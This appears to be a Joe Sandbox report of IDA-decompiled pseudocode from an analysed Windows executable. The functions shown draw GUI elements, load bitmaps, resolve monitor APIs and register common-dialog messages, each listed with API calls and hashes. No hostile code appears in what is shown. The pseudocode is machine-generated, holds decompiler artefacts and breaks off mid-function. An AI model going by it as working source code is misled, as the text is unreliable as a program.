                                            							 *((intOrPtr*)( *_t339 + 0x38))(_t355 - 0x4c,  *(_t355 - 0x2c),  *(_t355 - 0x28));
                                            							E00419FFB(_t339, _t355 - 0x54, 0, 0);
                                            							 *((intOrPtr*)( *_t339 + 0x24))(5);
                                            							E00419D35(_t339, _t355 - 0x3c);
                                            							Rectangle( *(_t339 + 4),  *_t351, _t351[1], _t351[2], _t351[3]);
                                            							E00419D35(_t339, _t355 - 0x34);
                                            							E0041A1BF(_t339, _t355 - 0x5c, _t351[2] + 1, _t351[1] + 3);
                                            							E0041A20B(_t339, _t351[2] + 1, _t351[3] + 1);
                                            							E0041A1BF(_t339, _t355 - 0x64,  *_t351 + 3, _t351[3] + 1);
                                            							E0041A20B(_t339, _t351[2] + 1, _t351[3] + 1);
                                            							asm("movsd");
                                            							asm("movsd");
                                            							asm("movsd");
                                            							asm("movsd");
                                            							 *(_t355 - 0x74) =  *(_t355 - 0x74) + 1;
                                            							 *((intOrPtr*)(_t355 - 0x70)) =  *((intOrPtr*)(_t355 - 0x70)) + 1;
                                            							 *((intOrPtr*)(_t355 - 0x6c)) =  *((intOrPtr*)(_t355 - 0x6c)) - 2;
                                            							 *((intOrPtr*)(_t355 - 0x68)) =  *((intOrPtr*)(_t355 - 0x68)) - 2;
                                            							_t239 = GetStockObject(0);
                                            							_t352 =  *((intOrPtr*)(_t355 + 8));
                                            							FillRect( *(_t352 + 4), _t355 - 0x74, _t239);
                                            							 *((intOrPtr*)( *_t352 + 0x20))(0xffffffff);
                                            							_t244 =  *((intOrPtr*)(_t281 + 0x114));
                                            							if( *((intOrPtr*)(_t244 + 0x10)) == 0) {
                                            								break;
                                            							}
                                            							_t317 =  *((intOrPtr*)(_t281 + 0xf4));
                                            							_t342 =  *((intOrPtr*)(_t355 - 0x10));
                                            							if(_t317 + _t342 > ( *( *((intOrPtr*)( *_t244 + 0x5c)) + 0x1e) & 0x0000ffff)) {
                                            								L18:
                                            								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x18))();
                                            								 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x78)) + 0x20))( *((intOrPtr*)(_t355 - 0x18)));
                                            								if(_t342 == 0) {
                                            									_t249 =  *((intOrPtr*)(_t281 + 0xf4));
                                            									if( *((intOrPtr*)(_t281 + 0xf4)) > 1) {
                                            										E00427C71(_t281, _t249 - 1, 1);
                                            									}
                                            								}
                                            								goto L21;
                                            							}
                                            							_t343 = _t342 + 1;
                                            							 *((intOrPtr*)( *_t281 + 0x110))(_t317, _t343);
                                            							_t353 =  *(_t355 - 0x1c);
                                            							E00428B78(_t281,  *((intOrPtr*)(_t281 + 0x74)), _t343,  *((intOrPtr*)(_t353 + 0x18)),  *((intOrPtr*)(_t353 + 0x1c)));
                                            							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x70))(0xd, 0, 0, _t355 - 0x24);
                                            							E004298F1( *((intOrPtr*)(_t281 + 0x74)), _t355 - 0x24);
                                            							 *(_t355 - 0x24) =  *(_t355 - 0x24) +  *_t353;
                                            							 *(_t355 - 0x20) =  *(_t355 - 0x20) +  *((intOrPtr*)(_t353 + 4));
                                            							 *(_t355 - 0x24) =  *(_t355 - 0x24) + 1;
                                            							 *(_t355 - 0x24) =  *(_t355 - 0x24) +  *(_t355 - 0x2c);
                                            							 *(_t355 - 0x20) =  *(_t355 - 0x20) + 1;
                                            							 *(_t355 - 0x20) =  *(_t355 - 0x20) +  *(_t355 - 0x28);
                                            							E00429859( *((intOrPtr*)(_t281 + 0x74)),  *(_t355 - 0x24),  *(_t355 - 0x20));
                                            							E0042986F( *((intOrPtr*)(_t281 + 0x74)));
                                            							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x70)))) + 0xfc))( *((intOrPtr*)(_t281 + 0x74)),  *((intOrPtr*)(_t281 + 0x114)));
                                            							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x18))();
                                            							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x78)) + 0x20))( *((intOrPtr*)(_t355 - 0x18)));
                                            							 *((intOrPtr*)(_t355 - 0x14)) =  *((intOrPtr*)(_t355 - 0x14)) + 0x28;
                                            							 *((intOrPtr*)(_t355 - 0x10)) = _t343;
                                            							if(_t343 <  *((intOrPtr*)(_t281 + 0xf8))) {
                                            								_t339 =  *((intOrPtr*)(_t355 + 8));
                                            								continue;
                                            							}
                                            							goto L21;
                                            						}
                                            						_t342 =  *((intOrPtr*)(_t355 - 0x10));
                                            						goto L18;
                                            					}
                                            				}
                                            			}

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00427437
                                            • GetViewportOrgEx.GDI32(?,?), ref: 00427462
                                            • GetSysColor.USER32(00000006), ref: 00427489
                                            • CreatePen.GDI32(00000000,00000002,00000000), ref: 00427490
                                            • GetSysColor.USER32(00000010), ref: 004274B0
                                            • CreatePen.GDI32(00000000,00000003,00000000), ref: 004274B8
                                            • GetDeviceCaps.GDI32(?,0000000A), ref: 00427556
                                            • GetDeviceCaps.GDI32(?,00000008), ref: 00427563
                                            • SetRect.USER32 ref: 00427577
                                            • DPtoLP.GDI32(?,?,00000002), ref: 0042758F
                                            • Rectangle.GDI32(00000001,72E7AD70,?,?,?), ref: 0042762D
                                              • Part of subcall function 00419D35: SelectObject.GDI32(?,00000000), ref: 00419D57
                                              • Part of subcall function 00419D35: SelectObject.GDI32(?,?), ref: 00419D6D
                                              • Part of subcall function 0041A1BF: MoveToEx.GDI32(?,?,?,?), ref: 0041A1E1
                                              • Part of subcall function 0041A1BF: MoveToEx.GDI32(?,?,?,?), ref: 0041A1F5
                                              • Part of subcall function 0041A20B: MoveToEx.GDI32(?,?,?,00000000), ref: 0041A225
                                              • Part of subcall function 0041A20B: LineTo.GDI32(?,?,?), ref: 0041A236
                                            • GetStockObject.GDI32(00000000), ref: 004276A4
                                            • FillRect.USER32 ref: 004276B5
                                              • Part of subcall function 004298F1: GetViewportExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 00429902
                                              • Part of subcall function 004298F1: GetWindowExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 0042990F
                                              • Part of subcall function 0042986F: GetDeviceCaps.GDI32(?,0000000A), ref: 00429884
                                              • Part of subcall function 0042986F: GetDeviceCaps.GDI32(?,00000008), ref: 0042988D
                                              • Part of subcall function 0042986F: SetMapMode.GDI32(?,00000001), ref: 004298A5
                                              • Part of subcall function 0042986F: SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 004298B3
                                              • Part of subcall function 0042986F: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 004298C3
                                              • Part of subcall function 0042986F: IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 004298DE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: CapsDevice$MoveObjectRectViewport$ColorCreateSelectWindow$ClipFillH_prologIntersectLineModeRectangleStock
                                            • String ID: (
                                            • API String ID: 14264375-3887548279
                                            • Opcode ID: 5356feb156921028ef3ddc0151e9ddf4cdc27a2cc2d9984696750f9678fc26b0
                                            • Instruction ID: c53487ea9dce1701cc3862e452b5fc9e596f4e2bded4e1f589efc21baabd4d08
                                            • Opcode Fuzzy Hash: 5356feb156921028ef3ddc0151e9ddf4cdc27a2cc2d9984696750f9678fc26b0
                                            • Instruction Fuzzy Hash: EED14970A00219DFCB15DFA4D985EAEBBB5FF48304F14406AF816AB266CB35AD41CF64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 83%
                                            			E0041C129(int _a4, int _a8, struct HDC__* _a12) {
                                            				int* _v8;
                                            				intOrPtr* _v12;
                                            				void* _v16;
                                            				void* _t37;
                                            				signed int _t42;
                                            				struct HDC__* _t49;
                                            				struct HBITMAP__* _t50;
                                            				intOrPtr* _t60;
                                            				int* _t61;
                                            				int _t66;
                                            				signed int _t69;
                                            				intOrPtr* _t74;
                                            				signed int _t77;
                                            				signed int* _t82;
                                            				int _t83;
                                            				struct HDC__* _t84;
                                            				intOrPtr* _t85;
                                            
                                            				_t37 = LoadResource(_a4, _a8);
                                            				if(_t37 == 0) {
                                            					L3:
                                            					return 0;
                                            				}
                                            				_t60 = LockResource(_t37);
                                            				_v12 = _t60;
                                            				if(_t60 == 0) {
                                            					goto L3;
                                            				}
                                            				_t80 =  *_t60 + 0x40;
                                            				_t85 = E00405667( *_t60 + 0x40);
                                            				if(_t85 != 0) {
                                            					E00405700(_t85, _t60, _t80);
                                            					_t82 = _t85 +  *_t85;
                                            					_a8 = 0x10;
                                            					do {
                                            						_t42 =  *_t82;
                                            						_t69 = 0;
                                            						_t74 = 0x42dbc0;
                                            						while(_t42 !=  *_t74) {
                                            							_t74 = _t74 + 8;
                                            							_t69 = _t69 + 1;
                                            							if(_t74 < "DllGetVersion") {
                                            								continue;
                                            							}
                                            							goto L13;
                                            						}
                                            						if(_a12 == 0) {
                                            							_t61 = 0x42dbc4 + _t69 * 8;
                                            							_v8 = _t61;
                                            							GetSysColor( *(0x42dbc4 + _t69 * 8));
                                            							GetSysColor( *_t61);
                                            							 *_t82 = 0 << 0x00000008 | GetSysColor( *_v8) >> 0x00000010 & 0x000000ff;
                                            						} else {
                                            							if( *(0x42dbc4 + _t69 * 8) != 0x12) {
                                            								 *_t82 = 0xffffff;
                                            							}
                                            						}
                                            						L13:
                                            						_t82 =  &(_t82[1]);
                                            						_t14 =  &_a8;
                                            						 *_t14 = _a8 - 1;
                                            					} while ( *_t14 != 0);
                                            					_t83 =  *(_t85 + 4);
                                            					_t66 =  *(_t85 + 8);
                                            					_a4 = _t83;
                                            					_a8 = _t66;
                                            					_t49 = GetDC(0);
                                            					_a12 = _t49;
                                            					_t50 = CreateCompatibleBitmap(_t49, _t83, _t66);
                                            					_v8 = _t50;
                                            					if(_t50 != 0) {
                                            						_t84 = CreateCompatibleDC(_a12);
                                            						_v16 = SelectObject(_t84, _v8);
                                            						_push(0xcc0020);
                                            						_push(0);
                                            						_push(_t85);
                                            						_t77 = 1;
                                            						StretchDIBits(_t84, 0, 0, _a4, _a8, 0, 0, _a4, _a8, _v12 + 0x28 + (_t77 <<  *(_t85 + 0xe)) * 4, ??, ??, ??);
                                            						SelectObject(_t84, _v16);
                                            						DeleteDC(_t84);
                                            					}
                                            					ReleaseDC(0, _a12);
                                            					E004062E0(_t85);
                                            					return _v8;
                                            				}
                                            				goto L3;
                                            			}

                                            APIs
                                            • LoadResource.KERNEL32(00000800,?,00000800,?,00000000,?,00000800), ref: 0041C138
                                            • LockResource.KERNEL32(00000000), ref: 0041C143
                                            • GetSysColor.USER32 ref: 0041C1C5
                                            • GetSysColor.USER32(00000000), ref: 0041C1D3
                                            • GetSysColor.USER32(00000000), ref: 0041C1E3
                                            • GetDC.USER32(00000000), ref: 0041C209
                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0041C215
                                            • CreateCompatibleDC.GDI32(00000000), ref: 0041C225
                                            • SelectObject.GDI32(00000000,00000000), ref: 0041C237
                                            • StretchDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00CC0020), ref: 0041C266
                                            • SelectObject.GDI32(00000000,00000000), ref: 0041C270
                                            • DeleteDC.GDI32(00000000), ref: 0041C273
                                            • ReleaseDC.USER32 ref: 0041C27E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Color$CompatibleCreateObjectResourceSelect$BitmapBitsDeleteLoadLockReleaseStretch
                                            • String ID: DllGetVersion
                                            • API String ID: 257281507-2861820592
                                            • Opcode ID: ba54e3975dec8b053c8b5ba4c6c2e954c4eed9ef953e3e4e01080731b16a167f
                                            • Instruction ID: 6de00a9f57abe9814b0481798e49b421408311c8e62ebcc167af93806f14bb4d
                                            • Opcode Fuzzy Hash: ba54e3975dec8b053c8b5ba4c6c2e954c4eed9ef953e3e4e01080731b16a167f
                                            • Instruction Fuzzy Hash: 8441D671640204FFDB219FA4DC88AAF3BB5FF48350B54802AF90597261D7349A56DFA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00404DD2() {
                                            				_Unknown_base(*)()* _t5;
                                            				_Unknown_base(*)()* _t6;
                                            				_Unknown_base(*)()* _t7;
                                            				_Unknown_base(*)()* _t8;
                                            				_Unknown_base(*)()* _t9;
                                            				_Unknown_base(*)()* _t10;
                                            				intOrPtr _t11;
                                            				struct HINSTANCE__* _t15;
                                            				intOrPtr _t17;
                                            				_Unknown_base(*)()* _t18;
                                            
                                            				_t17 =  *0x439620; // 0x0
                                            				if(_t17 == 0) {
                                            					_t15 = GetModuleHandleA("USER32");
                                            					if(_t15 == 0) {
                                            						L10:
                                            						 *0x439608 = 0;
                                            						 *0x43960c = 0;
                                            						 *0x439610 = 0;
                                            						 *0x439614 = 0;
                                            						 *0x439618 = 0;
                                            						 *0x43961c = 0;
                                            						 *0x439620 = 1;
                                            						return 0;
                                            					}
                                            					_t5 = GetProcAddress(_t15, "GetSystemMetrics");
                                            					 *0x439608 = _t5;
                                            					if(_t5 == 0) {
                                            						goto L10;
                                            					}
                                            					_t6 = GetProcAddress(_t15, "MonitorFromWindow");
                                            					 *0x43960c = _t6;
                                            					if(_t6 == 0) {
                                            						goto L10;
                                            					}
                                            					_t7 = GetProcAddress(_t15, "MonitorFromRect");
                                            					 *0x439610 = _t7;
                                            					if(_t7 == 0) {
                                            						goto L10;
                                            					}
                                            					_t8 = GetProcAddress(_t15, "MonitorFromPoint");
                                            					 *0x439614 = _t8;
                                            					if(_t8 == 0) {
                                            						goto L10;
                                            					}
                                            					_t9 = GetProcAddress(_t15, "EnumDisplayMonitors");
                                            					 *0x43961c = _t9;
                                            					if(_t9 == 0) {
                                            						goto L10;
                                            					}
                                            					_t10 = GetProcAddress(_t15, "GetMonitorInfoA");
                                            					 *0x439618 = _t10;
                                            					if(_t10 == 0) {
                                            						goto L10;
                                            					}
                                            					_t11 = 1;
                                            					 *0x439620 = _t11;
                                            					return _t11;
                                            				}
                                            				_t18 =  *0x439618; // 0x0
                                            				return 0 | _t18 != 0x00000000;
                                            			}

                                            APIs
                                            • GetModuleHandleA.KERNEL32(USER32,?,?,?,00404F0B), ref: 00404DF4
                                            • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00404E0C
                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00404E1D
                                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00404E2E
                                            • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 00404E3F
                                            • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00404E50
                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00404E61
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: AddressProc$HandleModule
                                            • String ID: EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                            • API String ID: 667068680-2376520503
                                            • Opcode ID: 7fe9bb0b6ed3d21d0ae434ea7fe5d9344b061dff9957d0254bf9a7d52565b885
                                            • Instruction ID: 29823efdfea0b27d0eaeb5a685ee6fdb8badc97bb1bd0a8226dd1226ed208354
                                            • Opcode Fuzzy Hash: 7fe9bb0b6ed3d21d0ae434ea7fe5d9344b061dff9957d0254bf9a7d52565b885
                                            • Instruction Fuzzy Hash: 081124B0A02610EAC711DF35ECD296FBAA4B7887643A4A53FD114E2290D7BC4941CBED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0042204B(intOrPtr* __ecx, struct HWND__* _a4, signed int _a8) {
                                            				struct HWND__* _v0;
                                            				intOrPtr _v4;
                                            				signed int _v8;
                                            				signed int _v12;
                                            				intOrPtr _t59;
                                            				int _t61;
                                            				int _t65;
                                            				struct HWND__* _t74;
                                            				struct HWND__* _t79;
                                            				struct HMENU__* _t81;
                                            				struct HWND__* _t84;
                                            				struct HWND__* _t88;
                                            				signed int _t90;
                                            				signed int _t91;
                                            				struct HMENU__* _t103;
                                            				intOrPtr* _t106;
                                            				int _t108;
                                            				intOrPtr* _t117;
                                            				int* _t118;
                                            				intOrPtr* _t119;
                                            				struct HWND__* _t120;
                                            
                                            				_t119 = __ecx;
                                            				_t59 =  *((intOrPtr*)( *__ecx + 0xc0))();
                                            				_t103 = 0;
                                            				_v4 = _t59;
                                            				if(_a4 != 0) {
                                            					_t117 =  *((intOrPtr*)(_t59 + 0x68));
                                            					if(_t117 != 0) {
                                            						 *((intOrPtr*)( *_t117 + 0x5c))(0);
                                            					}
                                            				}
                                            				_t120 =  *(_t119 + 0x70);
                                            				_t118 = _a8;
                                            				_v12 = _t103;
                                            				if(_t120 == _t103) {
                                            					L13:
                                            					_t118[2] = _v12;
                                            					if(_a4 == _t103) {
                                            						 *(_t119 + 0x9c) = _t103;
                                            						_t61 = GetDlgItem( *(_t119 + 0x1c), 0xea21);
                                            						__eflags = _t61;
                                            						_a4 = _t61;
                                            						if(_t61 != 0) {
                                            							_t74 = GetDlgItem( *(_t119 + 0x1c), 0xe900);
                                            							__eflags = _t74;
                                            							if(_t74 != 0) {
                                            								SetWindowLongA(_t74, 0xfffffff4, 0xea21);
                                            							}
                                            							SetWindowLongA(_a4, 0xfffffff4, 0xe900);
                                            						}
                                            						__eflags = _t118[1];
                                            						if(_t118[1] != 0) {
                                            							InvalidateRect( *(_t119 + 0x1c), 0, 1);
                                            							SetMenu( *(_t119 + 0x1c), _t118[1]);
                                            						}
                                            						_t108 =  *(_v4 + 0x68);
                                            						__eflags = _t108;
                                            						if(_t108 != 0) {
                                            							 *((intOrPtr*)( *_t108 + 0x5c))(1);
                                            						}
                                            						 *((intOrPtr*)( *_t119 + 0xc8))(1);
                                            						_t65 =  *_t118;
                                            						__eflags = _t65 - 0xe900;
                                            						if(_t65 != 0xe900) {
                                            							_v0 = GetDlgItem( *(_t119 + 0x1c), _t65);
                                            						}
                                            						ShowWindow(_v0, 5);
                                            						 *(_t119 + 0x48) = _t118[5];
                                            						return E00420A8B(1);
                                            					}
                                            					 *(_t119 + 0x9c) = _t118[4];
                                            					E00420A8B(_t103);
                                            					_t79 = GetDlgItem( *(_t119 + 0x1c),  *_t118);
                                            					_v0 = _t79;
                                            					ShowWindow(_t79, _t103);
                                            					_t81 = GetMenu( *(_t119 + 0x1c));
                                            					_t118[1] = _t81;
                                            					if(_t81 != _t103) {
                                            						InvalidateRect( *(_t119 + 0x1c), _t103, 1);
                                            						SetMenu( *(_t119 + 0x1c), _t103);
                                            						 *(_t119 + 0xb8) =  *(_t119 + 0xb8) & 0xfffffffe;
                                            					}
                                            					_t118[5] =  *(_t119 + 0x48);
                                            					 *(_t119 + 0x48) = _t103;
                                            					E0042065C(_t119, 0x7915);
                                            					if( *_t118 == 0xe900) {
                                            						_t84 = _a4;
                                            					} else {
                                            						_t84 = GetDlgItem( *(_t119 + 0x1c), 0xe900);
                                            					}
                                            					if(_t84 == 0) {
                                            						return _t84;
                                            					} else {
                                            						return SetWindowLongA(_t84, 0xfffffff4, 0xea21);
                                            					}
                                            				} else {
                                            					goto L4;
                                            				}
                                            				do {
                                            					L4:
                                            					_t88 = _t120;
                                            					_t120 = _v0;
                                            					_t106 =  *((intOrPtr*)(_t88 + 8));
                                            					_t90 = GetDlgCtrlID( *(_t106 + 0x1c)) & 0x0000ffff;
                                            					_v8 = _t90;
                                            					if(_t90 >= 0xe800 && _t90 <= 0xe81f) {
                                            						_t91 = 1;
                                            						_a8 = _t91 << _t90 - 0xe800;
                                            						if( *((intOrPtr*)( *_t106 + 0xc8))() != 0) {
                                            							_v12 = _v12 | _a8;
                                            						}
                                            						if( *((intOrPtr*)( *_t106 + 0xd0))() == 0 || _v8 != 0xe81f) {
                                            							E00421741(_t118[2] & _a8, _t106, _t118[2] & _a8, 1);
                                            						}
                                            					}
                                            				} while (_t120 != 0);
                                            				_t103 = 0;
                                            				goto L13;
                                            			}

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: ItemWindow$LongMenu$InvalidateRectShow$Ctrl
                                            • String ID:
                                            • API String ID: 461998371-0
                                            • Opcode ID: d02aa0295a976195957299b934b265eafdd74fa1612fec68cc443af8d633833d
                                            • Instruction ID: 11e971c61f50c2e3f40baeddfbca8ed65bc2cf00756bcc02c89e332112038adb
                                            • Opcode Fuzzy Hash: d02aa0295a976195957299b934b265eafdd74fa1612fec68cc443af8d633833d
                                            • Instruction Fuzzy Hash: D4617D30700311AFD7209F64EC88A2ABBF4FF48304F504A2EF656972A1CB75E855CB55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 94%
                                            			E004107DB(struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
                                            				void* _t32;
                                            				signed int _t34;
                                            				void* _t40;
                                            				int _t49;
                                            				signed int _t58;
                                            				intOrPtr _t63;
                                            				void* _t64;
                                            				intOrPtr* _t65;
                                            
                                            				if(_a4 == 0) {
                                            					L19:
                                            					return 0;
                                            				}
                                            				_t64 = E00425C92(0x4397cc, E0042440D);
                                            				_t54 =  *(_t64 + 0x18);
                                            				if( *(_t64 + 0x18) != 0) {
                                            					E00416433(_t54, _a4);
                                            					 *(_t64 + 0x18) =  *(_t64 + 0x18) & 0x00000000;
                                            				}
                                            				_t63 = _a8;
                                            				if(_t63 != 0x110) {
                                            					__eflags = _t63 -  *0x439cb0; // 0x0
                                            					if(__eflags == 0) {
                                            						L22:
                                            						SendMessageA(_a4, 0x111, 0xe146, 0);
                                            						_t32 = 1;
                                            						return _t32;
                                            					}
                                            					__eflags = _t63 - 0x111;
                                            					if(_t63 != 0x111) {
                                            						L8:
                                            						__eflags = _t63 - 0xc000;
                                            						if(_t63 < 0xc000) {
                                            							goto L19;
                                            						}
                                            						_push(_a4);
                                            						_t65 = E00413767();
                                            						_t34 = E00416753(_t65, 0x42e898);
                                            						__eflags = _t34;
                                            						if(_t34 == 0) {
                                            							L11:
                                            							__eflags = _t63 -  *0x439cbc; // 0x0
                                            							if(__eflags != 0) {
                                            								__eflags = _t63 -  *0x439cb8; // 0x0
                                            								if(__eflags != 0) {
                                            									__eflags = _t63 -  *0x439cc0; // 0x0
                                            									if(__eflags != 0) {
                                            										__eflags = _t63 -  *0x439cb4; // 0x0
                                            										if(__eflags != 0) {
                                            											goto L19;
                                            										}
                                            										return  *((intOrPtr*)( *_t65 + 0xd0))();
                                            									}
                                            									_t58 = _a16 >> 0x10;
                                            									__eflags = _t58;
                                            									 *((intOrPtr*)( *_t65 + 0xd8))(_a12, _a16 & 0x0000ffff, _t58);
                                            									goto L19;
                                            								}
                                            								__eflags =  *0x439c3c;
                                            								if( *0x439c3c != 0) {
                                            									 *(_t65 + 0x1f4) = _a16;
                                            								}
                                            								_t40 =  *((intOrPtr*)( *_t65 + 0xd4))();
                                            								 *(_t65 + 0x1f4) =  *(_t65 + 0x1f4) & 0x00000000;
                                            								return _t40;
                                            							}
                                            							return  *((intOrPtr*)( *_t65 + 0xd0))(_a16);
                                            						}
                                            						__eflags =  *(_t65 + 0x92) & 0x00000008;
                                            						if(( *(_t65 + 0x92) & 0x00000008) != 0) {
                                            							goto L19;
                                            						}
                                            						goto L11;
                                            					}
                                            					__eflags = _a12 - 0x40e;
                                            					if(_a12 == 0x40e) {
                                            						goto L22;
                                            					}
                                            					goto L8;
                                            				} else {
                                            					 *0x439cc0 = RegisterWindowMessageA("commdlg_LBSelChangedNotify");
                                            					 *0x439cbc = RegisterWindowMessageA("commdlg_ShareViolation");
                                            					 *0x439cb8 = RegisterWindowMessageA("commdlg_FileNameOK");
                                            					 *0x439cb4 = RegisterWindowMessageA("commdlg_ColorOK");
                                            					 *0x439cb0 = RegisterWindowMessageA("commdlg_help");
                                            					_t49 = RegisterWindowMessageA("commdlg_SetRGBColor");
                                            					_push(_a16);
                                            					 *0x439cac = _t49;
                                            					_push(_a12);
                                            					return E00411B77(_t54, _a4, 0x110);
                                            				}
                                            			}

                                            APIs
                                              • Part of subcall function 00425C92: TlsGetValue.KERNEL32(004399AC,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000,?,0040ECAE,00000000,00000000,00000000,00000000), ref: 00425CD1
                                            • RegisterWindowMessageA.USER32(commdlg_LBSelChangedNotify,Function_0002440D), ref: 00410826
                                            • RegisterWindowMessageA.USER32(commdlg_ShareViolation), ref: 00410832
                                            • RegisterWindowMessageA.USER32(commdlg_FileNameOK), ref: 0041083E
                                            • RegisterWindowMessageA.USER32(commdlg_ColorOK), ref: 0041084A
                                            • RegisterWindowMessageA.USER32(commdlg_help), ref: 00410856
                                            • RegisterWindowMessageA.USER32(commdlg_SetRGBColor), ref: 00410862
                                              • Part of subcall function 00416433: SetWindowLongA.USER32 ref: 00416462
                                            • SendMessageA.USER32(00000000,00000111,0000E146,00000000), ref: 00410955
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: MessageWindow$Register$LongSendValue
                                            • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                                            • API String ID: 2377901579-3888057576
                                            • Opcode ID: cf20618efcf828f21c6f481f5fb3a6feff5832e9dcd2cfa321dd56f44a1a627e
                                            • Instruction ID: 0c99fb2fb3094324f535d28c6dff1db6175635640ea54eadaac3d4f9a63322fb
                                            • Opcode Fuzzy Hash: cf20618efcf828f21c6f481f5fb3a6feff5832e9dcd2cfa321dd56f44a1a627e
                                            • Instruction Fuzzy Hash: B041AFB1704214ABDF24AF29DD54BAE3BA1EB00754F11542BF405972A2CBB99CC0CF9D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 92%
                                            			E00428103(intOrPtr* __ecx, void* __eflags) {
                                            				void* __ebx;
                                            				signed int _t227;
                                            				void* _t228;
                                            				CHAR* _t229;
                                            				intOrPtr _t231;
                                            				CHAR* _t232;
                                            				signed int _t233;
                                            				CHAR* _t242;
                                            				CHAR* _t243;
                                            				CHAR* _t253;
                                            				intOrPtr* _t256;
                                            				intOrPtr _t265;
                                            				signed char _t266;
                                            				intOrPtr _t268;
                                            				int _t290;
                                            				int _t296;
                                            				signed int _t300;
                                            				int _t310;
                                            				void* _t323;
                                            				void* _t335;
                                            				void* _t337;
                                            				intOrPtr _t353;
